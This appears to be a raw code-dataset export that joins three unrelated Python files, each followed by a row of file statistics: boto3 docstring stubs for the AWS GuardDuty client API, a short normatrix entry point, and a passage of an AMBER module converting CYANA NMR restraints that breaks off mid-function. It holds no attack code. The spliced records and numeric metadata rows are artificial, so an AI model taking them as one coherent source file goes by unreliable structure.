GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_ip_sets(DetectorId=None, MaxResults=None, NextToken=None):
"""
Lists the IPSets of the GuardDuty service specified by the detector ID. If you use this operation from a member account, the IPSets returned are the IPSets from the associated master account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_ip_sets(
DetectorId='string',
MaxResults=123,
NextToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the IPSet is associated with.\n
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
ReturnsResponse Syntax
{
'IpSetIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
IpSetIds (list) --
The IDs of the IPSet resources.
(string) --
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'IpSetIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_members(DetectorId=None, MaxResults=None, NextToken=None, OnlyAssociated=None):
"""
Lists details about associated member accounts for the current GuardDuty master account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_members(
DetectorId='string',
MaxResults=123,
NextToken='string',
OnlyAssociated='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector the member is associated with.\n
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter when paginating results. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:type OnlyAssociated: string
:param OnlyAssociated: Specifies what member accounts the response includes based on their relationship status with the master account. The default value is 'true'. If set to 'false' the response includes all existing member accounts (including members who haven\'t been invited yet or have been disassociated).
:rtype: dict
ReturnsResponse Syntax
{
'Members': [
{
'AccountId': 'string',
'DetectorId': 'string',
'MasterId': 'string',
'Email': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string',
'UpdatedAt': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Members (list) --
A list of members.
(dict) --
Contains information about the member account.
AccountId (string) --
The ID of the member account.
DetectorId (string) --
The detector ID of the member account.
MasterId (string) --
The master account ID.
Email (string) --
The email address of the member account.
RelationshipStatus (string) --
The status of the relationship between the member and the master.
InvitedAt (string) --
The timestamp when the invitation was sent.
UpdatedAt (string) --
The last-updated timestamp of the member.
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Members': [
{
'AccountId': 'string',
'DetectorId': 'string',
'MasterId': 'string',
'Email': 'string',
'RelationshipStatus': 'string',
'InvitedAt': 'string',
'UpdatedAt': 'string'
},
],
'NextToken': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_organization_admin_accounts(MaxResults=None, NextToken=None):
"""
Lists the accounts configured as GuardDuty delegated administrators.
See also: AWS API Documentation
Exceptions
:example: response = client.list_organization_admin_accounts(
MaxResults=123,
NextToken='string'
)
:type MaxResults: integer
:param MaxResults: The maximum number of results to return in the response.
:type NextToken: string
:param NextToken: A token to use for paginating results that are returned in the response. Set the value of this parameter to null for the first request to a list action. For subsequent calls, use the NextToken value returned from the previous request to continue listing results after the first page.
:rtype: dict
ReturnsResponse Syntax
{
'AdminAccounts': [
{
'AdminAccountId': 'string',
'AdminStatus': 'ENABLED'|'DISABLE_IN_PROGRESS'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
AdminAccounts (list) --
An AdminAccounts object that includes a list of accounts configured as GuardDuty delegated administrators.
(dict) --
The account within the organization specified as the GuardDuty delegated administrator.
AdminAccountId (string) --
The AWS account ID for the account.
AdminStatus (string) --
Indicates whether the account is enabled as the delegated administrator.
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'AdminAccounts': [
{
'AdminAccountId': 'string',
'AdminStatus': 'ENABLED'|'DISABLE_IN_PROGRESS'
},
],
'NextToken': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_publishing_destinations(DetectorId=None, MaxResults=None, NextToken=None):
"""
Returns a list of publishing destinations associated with the specified dectectorId .
See also: AWS API Documentation
Exceptions
:example: response = client.list_publishing_destinations(
DetectorId='string',
MaxResults=123,
NextToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector to retrieve publishing destinations for.\n
:type MaxResults: integer
:param MaxResults: The maximum number of results to return in the response.
:type NextToken: string
:param NextToken: A token to use for paginating results that are returned in the response. Set the value of this parameter to null for the first request to a list action. For subsequent calls, use the NextToken value returned from the previous request to continue listing results after the first page.
:rtype: dict
ReturnsResponse Syntax
{
'Destinations': [
{
'DestinationId': 'string',
'DestinationType': 'S3',
'Status': 'PENDING_VERIFICATION'|'PUBLISHING'|'UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY'|'STOPPED'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Destinations (list) --
A Destinations object that includes information about each publishing destination returned.
(dict) --
Contains information about the publishing destination, including the ID, type, and status.
DestinationId (string) --
The unique ID of the publishing destination.
DestinationType (string) --
The type of resource used for the publishing destination. Currently, only Amazon S3 buckets are supported.
Status (string) --
The status of the publishing destination.
NextToken (string) --
A token to use for paginating results that are returned in the response. Set the value of this parameter to null for the first request to a list action. For subsequent calls, use the NextToken value returned from the previous request to continue listing results after the first page.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Destinations': [
{
'DestinationId': 'string',
'DestinationType': 'S3',
'Status': 'PENDING_VERIFICATION'|'PUBLISHING'|'UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY'|'STOPPED'
},
],
'NextToken': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_tags_for_resource(ResourceArn=None):
"""
Lists tags for a resource. Tagging is currently supported for detectors, finding filters, IP sets, and threat intel sets, with a limit of 50 tags per resource. When invoked, this operation returns all assigned tags for a given resource.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_resource(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the given GuardDuty resource.\n
:rtype: dict
ReturnsResponse Syntax{
'Tags': {
'string': 'string'
}
}
Response Structure
(dict) --
Tags (dict) --The tags associated with the resource.
(string) --
(string) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Tags': {
'string': 'string'
}
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def list_threat_intel_sets(DetectorId=None, MaxResults=None, NextToken=None):
"""
Lists the ThreatIntelSets of the GuardDuty service specified by the detector ID. If you use this operation from a member account, the ThreatIntelSets associated with the master account are returned.
See also: AWS API Documentation
Exceptions
:example: response = client.list_threat_intel_sets(
DetectorId='string',
MaxResults=123,
NextToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the threatIntelSet is associated with.\n
:type MaxResults: integer
:param MaxResults: You can use this parameter to indicate the maximum number of items that you want in the response. The default value is 50. The maximum value is 50.
:type NextToken: string
:param NextToken: You can use this parameter to paginate results in the response. Set the value of this parameter to null on your first call to the list action. For subsequent calls to the action, fill nextToken in the request with the value of NextToken from the previous response to continue listing data.
:rtype: dict
ReturnsResponse Syntax
{
'ThreatIntelSetIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
ThreatIntelSetIds (list) --
The IDs of the ThreatIntelSet resources.
(string) --
NextToken (string) --
The pagination parameter to be used on the next list operation to retrieve more items.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'ThreatIntelSetIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def start_monitoring_members(DetectorId=None, AccountIds=None):
"""
Turns on GuardDuty monitoring of the specified member accounts. Use this operation to restart monitoring of accounts that you stopped monitoring with the StopMonitoringMembers operation.
See also: AWS API Documentation
Exceptions
:example: response = client.start_monitoring_members(
DetectorId='string',
AccountIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty master account associated with the member accounts to monitor.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the GuardDuty member accounts to start monitoring.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def stop_monitoring_members(DetectorId=None, AccountIds=None):
"""
Stops GuardDuty monitoring for the specified member accounts. Use the StartMonitoringMembers operation to restart monitoring for those accounts.
See also: AWS API Documentation
Exceptions
:example: response = client.stop_monitoring_members(
DetectorId='string',
AccountIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector associated with the GuardDuty master account that is monitoring member accounts.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs for the member accounts to stop monitoring.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
A list of objects that contain an accountId for each account that could not be processed, and a result string that indicates why the account was not processed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def tag_resource(ResourceArn=None, Tags=None):
"""
Adds tags to a resource.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceArn='string',
Tags={
'string': 'string'
}
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the GuardDuty resource to apply a tag to.\n
:type Tags: dict
:param Tags: [REQUIRED]\nThe tags to be added to a resource.\n\n(string) --\n(string) --\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def unarchive_findings(DetectorId=None, FindingIds=None):
"""
Unarchives GuardDuty findings specified by the findingIds .
See also: AWS API Documentation
Exceptions
:example: response = client.unarchive_findings(
DetectorId='string',
FindingIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector associated with the findings to unarchive.\n
:type FindingIds: list
:param FindingIds: [REQUIRED]\nThe IDs of the findings to unarchive.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def untag_resource(ResourceArn=None, TagKeys=None):
"""
Removes tags from a resource.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceArn='string',
TagKeys=[
'string',
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the resource to remove tags from.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nThe tag keys to remove from the resource.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_detector(DetectorId=None, Enable=None, FindingPublishingFrequency=None):
"""
Updates the Amazon GuardDuty detector specified by the detectorId.
See also: AWS API Documentation
Exceptions
:example: response = client.update_detector(
DetectorId='string',
Enable=True|False,
FindingPublishingFrequency='FIFTEEN_MINUTES'|'ONE_HOUR'|'SIX_HOURS'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector to update.\n
:type Enable: boolean
:param Enable: Specifies whether the detector is enabled or not enabled.
:type FindingPublishingFrequency: string
:param FindingPublishingFrequency: An enum value that specifies how frequently findings are exported, such as to CloudWatch Events.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_filter(DetectorId=None, FilterName=None, Description=None, Action=None, Rank=None, FindingCriteria=None):
"""
Updates the filter specified by the filter name.
See also: AWS API Documentation
Exceptions
:example: response = client.update_filter(
DetectorId='string',
FilterName='string',
Description='string',
Action='NOOP'|'ARCHIVE',
Rank=123,
FindingCriteria={
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that specifies the GuardDuty service where you want to update a filter.\n
:type FilterName: string
:param FilterName: [REQUIRED]\nThe name of the filter.\n
:type Description: string
:param Description: The description of the filter.
:type Action: string
:param Action: Specifies the action that is to be applied to the findings that match the filter.
:type Rank: integer
:param Rank: Specifies the position of the filter in the list of current filters. Also specifies the order in which this filter is applied to the findings.
:type FindingCriteria: dict
:param FindingCriteria: Represents the criteria to be used in the filter for querying findings.\n\nCriterion (dict) --Represents a map of finding properties that match specified conditions and values when querying findings.\n\n(string) --\n(dict) --Contains information about the condition.\n\nEq (list) --Represents the equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNeq (list) --Represents the not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGt (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGte (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLt (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLte (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\nEquals (list) --Represents an equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nNotEquals (list) --Represents a not equal condition to be applied to a single field when querying for findings.\n\n(string) --\n\n\nGreaterThan (integer) --Represents a greater than condition to be applied to a single field when querying for findings.\n\nGreaterThanOrEqual (integer) --Represents a greater than or equal condition to be applied to a single field when querying for findings.\n\nLessThan (integer) --Represents a less than condition to be applied to a single field when querying for findings.\n\nLessThanOrEqual (integer) --Represents a less than or equal condition to be applied to a single field when querying for findings.\n\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Name': 'string'
}
Response Structure
(dict) --
Name (string) --
The name of the filter.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Name': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def update_findings_feedback(DetectorId=None, FindingIds=None, Feedback=None, Comments=None):
"""
Marks the specified GuardDuty findings as useful or not useful.
See also: AWS API Documentation
Exceptions
:example: response = client.update_findings_feedback(
DetectorId='string',
FindingIds=[
'string',
],
Feedback='USEFUL'|'NOT_USEFUL',
Comments='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector associated with the findings to update feedback for.\n
:type FindingIds: list
:param FindingIds: [REQUIRED]\nThe IDs of the findings that you want to mark as useful or not useful.\n\n(string) --\n\n
:type Feedback: string
:param Feedback: [REQUIRED]\nThe feedback for the finding.\n
:type Comments: string
:param Comments: Additional feedback about the GuardDuty findings.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_ip_set(DetectorId=None, IpSetId=None, Name=None, Location=None, Activate=None):
"""
Updates the IPSet specified by the IPSet ID.
See also: AWS API Documentation
Exceptions
:example: response = client.update_ip_set(
DetectorId='string',
IpSetId='string',
Name='string',
Location='string',
Activate=True|False
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe detectorID that specifies the GuardDuty service whose IPSet you want to update.\n
:type IpSetId: string
:param IpSetId: [REQUIRED]\nThe unique ID that specifies the IPSet that you want to update.\n
:type Name: string
:param Name: The unique ID that specifies the IPSet that you want to update.
:type Location: string
:param Location: The updated URI of the file that contains the IPSet.
:type Activate: boolean
:param Activate: The updated Boolean value that specifies whether the IPSet is active or not.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_organization_configuration(DetectorId=None, AutoEnable=None):
"""
Updates the delegated administrator account with the values provided.
See also: AWS API Documentation
Exceptions
:example: response = client.update_organization_configuration(
DetectorId='string',
AutoEnable=True|False
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector to update the delegated administrator for.\n
:type AutoEnable: boolean
:param AutoEnable: [REQUIRED]\nIndicates whether to automatically enable member accounts in the organization.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_publishing_destination(DetectorId=None, DestinationId=None, DestinationProperties=None):
"""
Updates information about the publishing destination specified by the destinationId .
See also: AWS API Documentation
Exceptions
:example: response = client.update_publishing_destination(
DetectorId='string',
DestinationId='string',
DestinationProperties={
'DestinationArn': 'string',
'KmsKeyArn': 'string'
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector associated with the publishing destinations to update.\n
:type DestinationId: string
:param DestinationId: [REQUIRED]\nThe ID of the publishing destination to update.\n
:type DestinationProperties: dict
:param DestinationProperties: A DestinationProperties object that includes the DestinationArn and KmsKeyArn of the publishing destination.\n\nDestinationArn (string) --The ARN of the resource to publish to.\n\nKmsKeyArn (string) --The ARN of the KMS key to use for encryption.\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def update_threat_intel_set(DetectorId=None, ThreatIntelSetId=None, Name=None, Location=None, Activate=None):
"""
Updates the ThreatIntelSet specified by the ThreatIntelSet ID.
See also: AWS API Documentation
Exceptions
:example: response = client.update_threat_intel_set(
DetectorId='string',
ThreatIntelSetId='string',
Name='string',
Location='string',
Activate=True|False
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe detectorID that specifies the GuardDuty service whose ThreatIntelSet you want to update.\n
:type ThreatIntelSetId: string
:param ThreatIntelSetId: [REQUIRED]\nThe unique ID that specifies the ThreatIntelSet that you want to update.\n
:type Name: string
:param Name: The unique ID that specifies the ThreatIntelSet that you want to update.
:type Location: string
:param Location: The updated URI of the file that contains the ThreateIntelSet.
:type Activate: boolean
:param Activate: The updated Boolean value that specifies whether the ThreateIntelSet is active or not.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
| 26.712983 | 4,476 | 0.626066 | 13,719 | 134,767 | 6.129018 | 0.057584 | 0.014926 | 0.048166 | 0.042386 | 0.827506 | 0.795514 | 0.770991 | 0.760549 | 0.748727 | 0.733207 | 0 | 0.004504 | 0.289945 | 134,767 | 5,044 | 4,477 | 26.718279 | 0.87419 | 0.955108 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.5 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 10 |
e7b8b1292d9f5c676d92d4f8dd5b98ca716675e3 | 131 | py | Python | src/normatrix/__main__.py | Saverio976/NorMatrix | a26b2d3814990b126c9f8b40cacd6d62b4e82ac5 | [
"MIT"
] | 6 | 2022-01-11T16:53:37.000Z | 2022-03-20T23:27:04.000Z | src/normatrix/__main__.py | Saverio976/NorMatrix | a26b2d3814990b126c9f8b40cacd6d62b4e82ac5 | [
"MIT"
] | 7 | 2022-01-07T18:37:32.000Z | 2022-03-03T21:49:31.000Z | src/normatrix/__main__.py | Saverio976/NorMatrix | a26b2d3814990b126c9f8b40cacd6d62b4e82ac5 | [
"MIT"
] | 4 | 2022-01-07T18:03:17.000Z | 2022-03-20T18:45:14.000Z | try:
from normatrix.source.main import main
except ModuleNotFoundError:
from src.normatrix.source.main import main
main()
| 18.714286 | 46 | 0.770992 | 17 | 131 | 5.941176 | 0.529412 | 0.29703 | 0.376238 | 0.49505 | 0.574257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.160305 | 131 | 6 | 47 | 21.833333 | 0.918182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
99d2d6ccb28ec6be98aa162cb10af6aaf6c5ec30 | 38,890 | py | Python | webenmr/lib/amber_checks.py | andreagia/WEBNMR | 512a8cc04cf69300796585feae722614501389a9 | [
"Apache-2.0"
] | null | null | null | webenmr/lib/amber_checks.py | andreagia/WEBNMR | 512a8cc04cf69300796585feae722614501389a9 | [
"Apache-2.0"
] | null | null | null | webenmr/lib/amber_checks.py | andreagia/WEBNMR | 512a8cc04cf69300796585feae722614501389a9 | [
"Apache-2.0"
] | null | null | null | from lxml import etree
import os
import math
from pyparsing import *
import webenmr.lib.cnvx as cnvx
#import amber_md.lib.cnvpx as cnvpx
import webenmr.lib.cnvdx as cnvdx
from pylons import config, session
def check_noe_d_cyana(xmlin, cyana):
print "#######XML_NOE_CYANA################"
print etree.tostring(xmlin, pretty_print=True)
print "####################################"
lol = False
for elt in xmlin.getiterator():
if elt.tag == "noe":
f_noe = elt.get('filename')
ini_num = elt.get('number')
if elt.get('lol') == "False":
lol = False
elif elt.get('lol') == "True":
lol = True
else:
lol = False
if elt.get('nocorr') == "False":
nocorr = False
elif elt.get('nocorr') == "True":
nocorr = True
print f_noe
#check if NOE is Lower Limits
#if f_noe.split(".")[-1] == "lol":
# lol = True
noe_in = os.path.join(config['app_conf']['amber_data'],session.get('DIR_CACHE'), f_noe)
xxx = open(noe_in,"r").readlines()
#if os.path.exists(noe_in):
# os.remove(noe_in)
root = etree.Element("noe")
if lol:
etree.SubElement(root, "lol").text = "True"
else:
etree.SubElement(root, "lol").text = "False"
for t in xxx:
if len(t) > 0:
sd = t.split("#")[0].replace(">","").replace("<","")
sf = sd.split()
if len(sf) == 2 and sf[0].isdigit():
resnu1 = sf[0]
resna1 = sf[1]
if len(sf) >= 5 and not sf[0].isdigit():
if sf[1].isdigit():
atm1 = sf[0]
resnu2 = sf[1]
resna2 = sf[2]
atm2 = sf[3]
if atm1[0] == "Q" and atm1[1] != "Q":
atm1 = "H"+atm1[1:]+"#"
# moved to cnvx.py
#if atm1[0] == "Q" and atm1[1] == "Q":
#if resna1 == "LEU":
#atm1 = "CG"
#if resna1 == "VAL":
#atm1 = "CB"
if atm2[0] == "Q" and atm2[1] != "Q":
atm2 = "H"+atm2[1:]+"#"
# moved to cnvx.py
#if atm2[0] == "Q" and atm2[1] == "Q":
#if resna2 == "LEU":
#atm2 = "CG"
#if resna2 == "VAL":
#atm2 = "CB"
val = sf[4]
print resnu1,resna1,atm1,resnu2,resna2,atm2,val
sel = etree.SubElement(root, "selection")
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu1
etree.SubElement(sel1, "name").text = atm1
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu2
etree.SubElement(sel2, "name").text = atm2
dist = etree.SubElement(sel, "D")
etree.SubElement(dist, "D").text = val
etree.SubElement(dist, "D_minus").text = str(float(val) - 1.8)
etree.SubElement(dist, "D_plus").text = "0"
if len(sf) >= 7 and sf[0].isdigit():
print"7"
print sd
if sf[3].isdigit():
sel = etree.SubElement(root, "selection")
resnu1 = sf[0]
resna1 = sf[1]
atm1 = sf[2]
resnu2 = sf[3]
resna2 = sf[4]
atm2 = sf[5]
val = sf[6]
# moved to cnvx.py
#if atm1[0] == "Q" and atm1[1] == "Q":
# if resna1 == "LEU":
# atm1 = "CG"
# if resna1 == "VAL":
# atm1 = "CB"
if atm1[0] == "Q" and atm1[1] != "Q":
atm1 = "H"+atm1[1:]+"#"
if atm1[0] == "Q" and atm1[1] == "R":
atm1 = "H"+atm1[1:]+"$"
# moved to cnvx.py
#if atm2[0] == "Q" and atm2[1] == "Q":
# if resna2 == "LEU":
# atm2 = "CG"
# if resna2 == "VAL":
# atm2 = "CB"
if atm2[0] == "Q" and atm2[1] != "Q":
atm2 = "H"+atm2[1:]+"#"
if atm2[0] == "Q" and atm2[1] == "R":
atm2 = "H"+atm2[1:]+"$"
sel1 = etree.SubElement(sel, "sel1")
etree.SubElement(sel1, "resid").text = resnu1
etree.SubElement(sel1, "name").text = atm1
sel2 = etree.SubElement(sel, "sel2")
etree.SubElement(sel2, "resid").text = resnu2
etree.SubElement(sel2, "name").text = atm2
dist = etree.SubElement(sel, "D")
etree.SubElement(dist, "D").text = val
etree.SubElement(dist, "D_minus").text = "0"
etree.SubElement(dist, "D_plus").text = "0"
#print etree.tostring(root, pretty_print=True)
pdb_out = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "out_leap.pdb")
pdb_ref_n = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), "pdb.ref")
#
#xml_file = os.path.join(config['app_conf']['amber_data'],session.get('DIR_CACHE'), "xml_noe")
#xml_file_w = open(xml_file, 'w')
#xml_file_w.write()
#xml_file_w.close()
print pdb_out
print pdb_ref_n
print etree.tostring(root, pretty_print=True)
#nocorr = 0
[ resu_vx, rst ]= cnvx.convert(root, ini_num, pdb_out, pdb_ref_n, nocorr)
noe_out_rst = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_noe + "_noe_RST")
print noe_out_rst
noe_out_rst_file = open(noe_out_rst, 'w')
noe_out_rst_file.writelines(rst)
noe_out_rst_file.close()
return resu_vx
def check_dih_d_cyana(xmlin, cyana):
print "XML DIH INPUT"
print etree.tostring(xmlin, pretty_print=True)
for elt in xmlin.getiterator():
if elt.tag == "dihedral":
f_dih = elt.get('filename')
ini_num = elt.get('number')
print f_dih
noe_in = os.path.join(config['app_conf']['amber_data'], session.get('DIR_CACHE'), f_dih)
xxx = open(noe_in,"r").readlines()
#if os.path.exists(noe_in):
# os.remove(noe_in)
root = etree.Element("dih")
for t in xxx:
if len(t) > 0:
sd = t.split("#")[0].replace(">","").replace("<","")
sf = sd.split()
print sf
if len(sf) >= 4 :
if sf[0].isdigit():
sel = etree.SubElement(root, "selection")
resnu = sf[0]
resna = sf[1]
ang = sf[2]
ang1 = sf[3]
ang2 = sf[4]
ang_ok = False
# check from cyana-dyana library angle assignment for any residues
if ang == "PHI":
atm1 = "C"
atm2 = "N"
atm3 = "CA"
atm4 = "C"
resnu1 = str(int(resnu) - 1)
resnu2 = resnu
ang_ok = True
if ang == "PSI":
atm1 = "N"
atm2 = "CA"
atm3 = "C"
atm4 = "N"
resnu1 = resnu
resnu2 = str(int(resnu) + 1)
ang_ok = True
